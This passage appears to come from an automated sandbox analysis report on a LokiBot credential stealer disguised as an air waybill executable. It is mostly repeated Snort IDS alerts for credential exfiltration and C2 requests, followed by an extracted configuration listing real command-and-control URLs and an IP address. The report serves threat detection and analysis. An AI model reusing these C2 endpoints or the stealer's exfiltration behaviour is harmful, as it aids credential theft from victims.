                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:56.719260
                        SID:2024318
                        Source Port:49838
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:49.906919
                        SID:2021641
                        Source Port:49835
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:41.014214
                        SID:2024313
                        Source Port:49828
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:31.634111
                        SID:2024313
                        Source Port:49823
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:27.987761
                        SID:2021641
                        Source Port:49820
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:31.634111
                        SID:2024318
                        Source Port:49823
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:59.746040
                        SID:2021641
                        Source Port:49798
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:25.250536
                        SID:2024318
                        Source Port:49771
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:05.247702
                        SID:2021641
                        Source Port:49802
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:24.107780
                        SID:2021641
                        Source Port:49817
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:45.029471
                        SID:2024318
                        Source Port:49831
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:25.250536
                        SID:2024313
                        Source Port:49771
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:45.029471
                        SID:2024313
                        Source Port:49831
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:17.524612
                        SID:2021641
                        Source Port:49765
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:34.305329
                        SID:2021641
                        Source Port:49825
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:41.192422
                        SID:2021641
                        Source Port:49783
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:18.909479
                        SID:2024318
                        Source Port:49813
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:01.045653
                        SID:2021641
                        Source Port:49747
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:48.461124
                        SID:2021641
                        Source Port:49788
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:32.329146
                        SID:2024318
                        Source Port:49776
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:18.909479
                        SID:2024313
                        Source Port:49813
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:32.329146
                        SID:2024313
                        Source Port:49776
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:25.348509
                        SID:2024313
                        Source Port:49818
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:54.719782
                        SID:2024313
                        Source Port:49794
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:54.719782
                        SID:2024318
                        Source Port:49794
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:41:57.336379
                        SID:2024312
                        Source Port:49735
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:57.200454
                        SID:2024313
                        Source Port:49796
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:25.348509
                        SID:2024318
                        Source Port:49818
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:41:57.336379
                        SID:2024317
                        Source Port:49735
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:21.643851
                        SID:2021641
                        Source Port:49815
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:17.642261
                        SID:2021641
                        Source Port:49812
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:34.955343
                        SID:2021641
                        Source Port:49778
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:57.200454
                        SID:2024318
                        Source Port:49796
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:15.058675
                        SID:2024318
                        Source Port:49763
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:18.729353
                        SID:2024318
                        Source Port:49766
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:06.504867
                        SID:2024313
                        Source Port:49803
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:06.504867
                        SID:2024318
                        Source Port:49803
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:31.102796
                        SID:2021641
                        Source Port:49775
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:02.240601
                        SID:2024313
                        Source Port:49800
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:08.999268
                        SID:2024313
                        Source Port:49805
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:15.058675
                        SID:2024313
                        Source Port:49763
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:12.681066
                        SID:2024313
                        Source Port:49808
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:18.729353
                        SID:2024313
                        Source Port:49766
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:38.643235
                        SID:2021641
                        Source Port:49781
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:02.240601
                        SID:2024318
                        Source Port:49800
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:41:59.827008
                        SID:2021641
                        Source Port:49745
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:16.392996
                        SID:2024313
                        Source Port:49811
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:29.915605
                        SID:2024318
                        Source Port:49774
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:50.920365
                        SID:2024318
                        Source Port:49791
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:45.849788
                        SID:2021641
                        Source Port:49786
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:08.999268
                        SID:2024318
                        Source Port:49805
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:21.173515
                        SID:2024313
                        Source Port:49768
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:16.392996
                        SID:2024318
                        Source Port:49811
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:21.173515
                        SID:2024318
                        Source Port:49768
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:29.915605
                        SID:2024313
                        Source Port:49774
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:56.719260
                        SID:2024313
                        Source Port:49838
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:13.935226
                        SID:2021641
                        Source Port:49809
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:28.624649
                        SID:2021641
                        Source Port:49773
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:47.479485
                        SID:2024318
                        Source Port:49833
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:07.780738
                        SID:2021641
                        Source Port:49804
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:50.920365
                        SID:2024313
                        Source Port:49791
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:47.479485
                        SID:2024313
                        Source Port:49833
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:15.173099
                        SID:2021641
                        Source Port:49810
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:05.989811
                        SID:2024318
                        Source Port:49755
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:16.290446
                        SID:2024313
                        Source Port:49764
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:03.512691
                        SID:2021641
                        Source Port:49752
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:09.977319
                        SID:2021641
                        Source Port:49758
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:28.624649
                        SID:2024313
                        Source Port:49773
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:02.263836
                        SID:2021641
                        Source Port:49749
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:12.423265
                        SID:2021641
                        Source Port:49761
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:28.624649
                        SID:2024318
                        Source Port:49773
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:05.989811
                        SID:2024313
                        Source Port:49755
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:16.290446
                        SID:2024318
                        Source Port:49764
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:23.788777
                        SID:2021641
                        Source Port:49770
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:26.739380
                        SID:2021641
                        Source Port:49819
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:46.244048
                        SID:2021641
                        Source Port:49832
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:59.746040
                        SID:2024318
                        Source Port:49798
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:49.681959
                        SID:2024318
                        Source Port:49789
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:41.014214
                        SID:2021641
                        Source Port:49828
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:59.746040
                        SID:2024313
                        Source Port:49798
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:49.681959
                        SID:2024313
                        Source Port:49789
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:33.541899
                        SID:2021641
                        Source Port:49777
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:04.713098
                        SID:2024313
                        Source Port:49754
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:25.250536
                        SID:2021641
                        Source Port:49771
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:34.305329
                        SID:2024318
                        Source Port:49825
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:05.247702
                        SID:2024313
                        Source Port:49802
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:04.713098
                        SID:2024318
                        Source Port:49754
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:41.192422
                        SID:2024318
                        Source Port:49783
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:41.192422
                        SID:2024313
                        Source Port:49783
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:34.305329
                        SID:2024313
                        Source Port:49825
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:45.029471
                        SID:2021641
                        Source Port:49831
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:05.247702
                        SID:2024318
                        Source Port:49802
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:11.222525
                        SID:2021641
                        Source Port:49759
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:42.568421
                        SID:2021641
                        Source Port:49829
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:10.231973
                        SID:2024313
                        Source Port:49806
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:39.921949
                        SID:2024318
                        Source Port:49782
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:41:58.700835
                        SID:2024317
                        Source Port:49741
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:39.921949
                        SID:2024313
                        Source Port:49782
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:18.909479
                        SID:2021641
                        Source Port:49813
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:41:58.700835
                        SID:2024312
                        Source Port:49741
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:29.212593
                        SID:2024318
                        Source Port:49821
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:53.510184
                        SID:2021641
                        Source Port:49793
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:00.985732
                        SID:2024313
                        Source Port:49799
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:00.985732
                        SID:2024318
                        Source Port:49799
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:17.642261
                        SID:2024318
                        Source Port:49812
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:29.212593
                        SID:2024313
                        Source Port:49821
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:57.200454
                        SID:2021641
                        Source Port:49796
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:21.643851
                        SID:2024318
                        Source Port:49815
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:17.642261
                        SID:2024313
                        Source Port:49812
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:47.218743
                        SID:2021641
                        Source Port:49787
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:10.231973
                        SID:2024318
                        Source Port:49806
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:06.504867
                        SID:2021641
                        Source Port:49803
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:02.240601
                        SID:2021641
                        Source Port:49800
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:29.915605
                        SID:2021641
                        Source Port:49774
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:41:59.827008
                        SID:2024313
                        Source Port:49745
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:45.849788
                        SID:2024313
                        Source Port:49786
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:41.014214
                        SID:2024318
                        Source Port:49828
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:21.173515
                        SID:2021641
                        Source Port:49768
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:37.405098
                        SID:2021641
                        Source Port:49780
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:45.849788
                        SID:2024318
                        Source Port:49786
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:52.171897
                        SID:2024313
                        Source Port:49792
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:48.680283
                        SID:2024313
                        Source Port:49834
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:41:59.827008
                        SID:2024318
                        Source Port:49745
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:48.680283
                        SID:2024318
                        Source Port:49834
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:52.171897
                        SID:2024318
                        Source Port:49792
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:13.935226
                        SID:2024313
                        Source Port:49809
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:56.719260
                        SID:2021641
                        Source Port:49838
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:30.405107
                        SID:2021641
                        Source Port:49822
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:13.935226
                        SID:2024318
                        Source Port:49809
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:21.643851
                        SID:2024313
                        Source Port:49815
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: http://kbfvzoboss.bid/alien/fre.phpURL Reputation: Label: malware
                        Source: http://alphastand.top/alien/fre.phpURL Reputation: Label: malware
                        Source: http://alphastand.win/alien/fre.phpURL Reputation: Label: malware
                        Source: http://alphastand.trade/alien/fre.phpURL Reputation: Label: malware
                        Source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://45.77.223.48/~blog/?ajax=ee"]}
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeJoe Sandbox ML: detected
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: mscorlib.pdbMZ source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Data.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Xml.ni.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: Accessibility.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.ni.pdbRSDS source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: UHN.pdbO source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Configuration.ni.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: mscorlib.ni.pdbRSDS source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Data.ni.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Configuration.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: UHN.pdbSHA256Q source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                        Source: Binary string: System.Xml.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: Microsoft.VisualBasic.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Core.ni.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Windows.Forms.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: mscorlib.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: UHN.pdb source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Drawing.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: mscorlib.ni.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Core.pdb< source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Data.ni.pdbRSDS source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Core.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: Accessibility.pdbMZ source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.ni.pdb source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Data.pdb, source: WER63DD.tmp.dmp.6.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WER63DD.tmp.dmp.6.dr
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,3_2_00403D74

                        Networking

                        barindex
                        Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49735 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49735 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49735 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49741 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49741 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49741 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49745 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49745 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49745 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49747 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49747 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49747 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49749 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49749 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49749 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49752 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49752 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49752 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49754 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49754 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49754 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49755 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49755 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49755 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49756 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49756 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49756 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49757 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49757 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49757 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49758 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49758 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49758 -> 45.77.223.48:80
